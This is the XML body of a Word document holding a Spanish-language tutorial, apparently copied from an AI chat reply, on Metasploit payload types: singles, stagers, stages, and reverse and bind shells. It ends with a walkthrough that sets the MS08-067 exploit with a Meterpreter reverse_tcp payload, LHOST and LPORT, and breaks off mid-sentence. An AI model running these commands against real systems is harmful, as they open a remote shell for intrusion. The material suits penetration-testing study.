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03D" w:rsidRPr="00A7003D" w:rsidRDefault="00A7003D" w:rsidP="00A7003D">
      <w:p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En el contexto de Metasploit y pruebas de penetración, un payload es el código que se ejecuta en el sistema objetivo después de que se ha explotado una vulnerabilidad. Metasploit proporciona una variedad de payloads que pueden realizar diferentes acciones, como abrir una shell, ejecutar comandos, o establecer una conexión persistente. Aquí te presento una clasificación general de los tipos de payloads disponibles en Metasploit:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7003D" w:rsidRPr="00A7003D" w:rsidRDefault="00A7003D" w:rsidP="00A7003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003D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>Tipos de Payloads en Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7003D" w:rsidRPr="00A7003D" w:rsidRDefault="00A7003D" w:rsidP="00A700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Singles</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7003D" w:rsidRPr="00A7003D" w:rsidRDefault="00A7003D" w:rsidP="00A700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 xml:space="preserve">Los payloads </w:t>
      </w:r>
      <w:r w:rsidRPr="00A7003D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>singles</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7003D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t xml:space="preserve"> son autónomos y realizan una acción específica sin requerir una conexión adicional al atacante.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7003D" w:rsidRPr="00A7003D" w:rsidRDefault="00A7003D" w:rsidP="00A700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Ejemplo</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7003D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A7003D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>cmd/unix/reverse_perl</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7003D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t xml:space="preserve"> ejecuta un script Perl que proporciona una shell inversa.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7003D" w:rsidRPr="00A7003D" w:rsidRDefault="00A7003D" w:rsidP="00A700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Stagers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7003D" w:rsidRPr="00A7003D" w:rsidRDefault="00A7003D" w:rsidP="00A700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 xml:space="preserve">Los payloads </w:t>
      </w:r>
      <w:r w:rsidRPr="00A7003D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>stagers</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7003D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t xml:space="preserve"> establecen una conexión con el atacante y luego descargan y ejecutan un payload más grande.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7003D" w:rsidRPr="00A7003D" w:rsidRDefault="00A7003D" w:rsidP="00A700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Ejemplo</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7003D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A7003D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>windows/meterpreter/reverse_tcp</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7003D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t xml:space="preserve"> conecta de vuelta al atacante y luego carga el payload </w:t>
      </w:r>
      <w:r w:rsidRPr="00A7003D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7003D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7003D" w:rsidRPr="00A7003D" w:rsidRDefault="00A7003D" w:rsidP="00A700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Stages</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7003D" w:rsidRPr="00A7003D" w:rsidRDefault="00A7003D" w:rsidP="00A700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 xml:space="preserve">Los payloads </w:t>
      </w:r>
      <w:r w:rsidRPr="00A7003D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>stages</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7003D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t xml:space="preserve"> son grandes y se ejecutan después de que el stager ha establecido una conexión. Estos payloads pueden ser complejos y proporcionar funciones avanzadas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7003D" w:rsidRPr="00A7003D" w:rsidRDefault="00A7003D" w:rsidP="00A7003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Ejemplo</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7003D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A7003D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7003D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t xml:space="preserve"> es un payload avanzado que ofrece una amplia gama de comandos para interactuar con el sistema comprometido.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7003D" w:rsidRPr="00A7003D" w:rsidRDefault="00A7003D" w:rsidP="00A7003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003D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>Clasificación por Plataforma</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7003D" w:rsidRPr="00A7003D" w:rsidRDefault="00A7003D" w:rsidP="00A7003D">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A7003D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>Payloads para Windows</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7003D" w:rsidRPr="00A7003D" w:rsidRDefault="00A7003D" w:rsidP="00A70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windows/shell/reverse_tcp</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7003D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>: Conecta al atacante y proporciona una shell inversa.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7003D" w:rsidRPr="00A7003D" w:rsidRDefault="00A7003D" w:rsidP="00A70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windows/meterpreter/reverse_tcp</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7003D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>: Conecta al atacante y proporciona una instancia de Meterpreter.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7003D" w:rsidRPr="00A7003D" w:rsidRDefault="00A7003D" w:rsidP="00A70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windows/exec</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7003D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>: Ejecuta un comando específico en el sistema objetivo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7003D" w:rsidRPr="00A7003D" w:rsidRDefault="00A7003D" w:rsidP="00A700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windows/adduser</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7003D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>: Añade un usuario al sistema objetivo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7003D" w:rsidRPr="00A7003D" w:rsidRDefault="00A7003D" w:rsidP="00A7003D">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A7003D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>Payloads para Linux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7003D" w:rsidRPr="00A7003D" w:rsidRDefault="00A7003D" w:rsidP="00A70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linux/x86/shell/reverse_tcp</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7003D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>: Conecta al atacante y proporciona una shell inversa.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7003D" w:rsidRPr="00A7003D" w:rsidRDefault="00A7003D" w:rsidP="00A70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linux/x86/meterpreter/reverse_tcp</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7003D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>: Conecta al atacante y proporciona una instancia de Meterpreter.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7003D" w:rsidRPr="00A7003D" w:rsidRDefault="00A7003D" w:rsidP="00A700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linux/x86/exec</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7003D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>: Ejecuta un comando específico en el sistema objetivo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7003D" w:rsidRPr="00A7003D" w:rsidRDefault="00A7003D" w:rsidP="00A7003D">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A7003D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>Payloads para macOS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7003D" w:rsidRPr="00A7003D" w:rsidRDefault="00A7003D" w:rsidP="00A700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osx/x86/shell_reverse_tcp</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7003D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>: Conecta al atacante y proporciona una shell inversa.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7003D" w:rsidRPr="00A7003D" w:rsidRDefault="00A7003D" w:rsidP="00A700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lastRenderedPageBreak/>
        <w:t>osx/x86/meterpreter/reverse_tcp</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7003D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>: Conecta al atacante y proporciona una instancia de Meterpreter.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7003D" w:rsidRPr="00A7003D" w:rsidRDefault="00A7003D" w:rsidP="00A700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osx/x86/exec</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7003D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>: Ejecuta un comando específico en el sistema objetivo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7003D" w:rsidRPr="00A7003D" w:rsidRDefault="00A7003D" w:rsidP="00A7003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003D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>Clasificación por Conexión</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7003D" w:rsidRPr="00A7003D" w:rsidRDefault="00A7003D" w:rsidP="00A70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Reverse Shells</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7003D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>: Payloads que hacen que el objetivo se conecte de vuelta al atacante.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7003D" w:rsidRPr="00A7003D" w:rsidRDefault="00A7003D" w:rsidP="00A700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Ejemplo</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7003D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A7003D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>windows/shell/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7003D" w:rsidRPr="00A7003D" w:rsidRDefault="00A7003D" w:rsidP="00A70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Bind Shells</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7003D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>: Payloads que abren un puerto en el sistema objetivo y esperan a que el atacante se conecte.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7003D" w:rsidRPr="00A7003D" w:rsidRDefault="00A7003D" w:rsidP="00A700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Ejemplo</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7003D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A7003D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>windows/shell/bind_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7003D" w:rsidRPr="00A7003D" w:rsidRDefault="00A7003D" w:rsidP="00A70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Meterpreter</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7003D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>: Payload avanzado que proporciona una shell interactiva y muchas funcionalidades adicionales.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7003D" w:rsidRPr="00A7003D" w:rsidRDefault="00A7003D" w:rsidP="00A700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Ejemplo</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7003D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A7003D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7003D" w:rsidRPr="00A7003D" w:rsidRDefault="00A7003D" w:rsidP="00A700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Inline</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7003D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>: Payloads que combinan la funcionalidad del stager y el stage en un solo payload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7003D" w:rsidRPr="00A7003D" w:rsidRDefault="00A7003D" w:rsidP="00A7003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Ejemplo</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7003D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A7003D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>windows/meterpreter_reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7003D" w:rsidRPr="00A7003D" w:rsidRDefault="00A7003D" w:rsidP="00A7003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003D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>Ejemplos Prácticos de Uso de Payloads en Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7003D" w:rsidRPr="00A7003D" w:rsidRDefault="00A7003D" w:rsidP="00A700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Seleccionar un Exploit y Configurar un Payload</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7003D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7003D" w:rsidRPr="00A7003D" w:rsidRDefault="00A7003D" w:rsidP="00A700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Supongamos que estás utilizando un exploit para una vulnerabilidad en Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7003D" w:rsidRPr="00A7003D" w:rsidRDefault="00A7003D" w:rsidP="00A700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Selecciona el exploit:</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bash</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Copy code</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use exploit/windows/smb/ms08_067_netapi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7003D" w:rsidRPr="00A7003D" w:rsidRDefault="00A7003D" w:rsidP="00A700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Ver los payloads compatibles:</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bash</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Copy code</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show payloads</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7003D" w:rsidRPr="00A7003D" w:rsidRDefault="00A7003D" w:rsidP="00A700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Selecciona un payload:</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bash</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Copy code</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set PAYLOAD windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7003D" w:rsidRPr="00A7003D" w:rsidRDefault="00A7003D" w:rsidP="00A700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Configura las opciones necesarias, como la dirección IP del atacante (</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7003D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>LHOST</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7003D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>) y el puerto (</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7003D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>LPORT</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7003D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>):</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bash</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Copy code</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set LHOST 192.168.x.x</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set LPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7003D" w:rsidRPr="00A7003D" w:rsidRDefault="00A7003D" w:rsidP="00A700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lastRenderedPageBreak/>
        <w:t>Ejecutar el Exploit</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7003D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7003D" w:rsidRPr="00A7003D" w:rsidRDefault="00A7003D" w:rsidP="00A700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Ejecuta el exploit para comprometer el sistema objetivo y desplegar el payload:</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bash</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Copy code</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run</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7003D" w:rsidRPr="00A7003D" w:rsidRDefault="00A7003D" w:rsidP="00A700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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>Interacción con el Payload</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7003D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7003D" w:rsidRPr="00A7003D" w:rsidRDefault="00A7003D" w:rsidP="00A700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 xml:space="preserve">Si utilizaste </w:t>
      </w:r>
      <w:r w:rsidRPr="00A7003D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7003D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
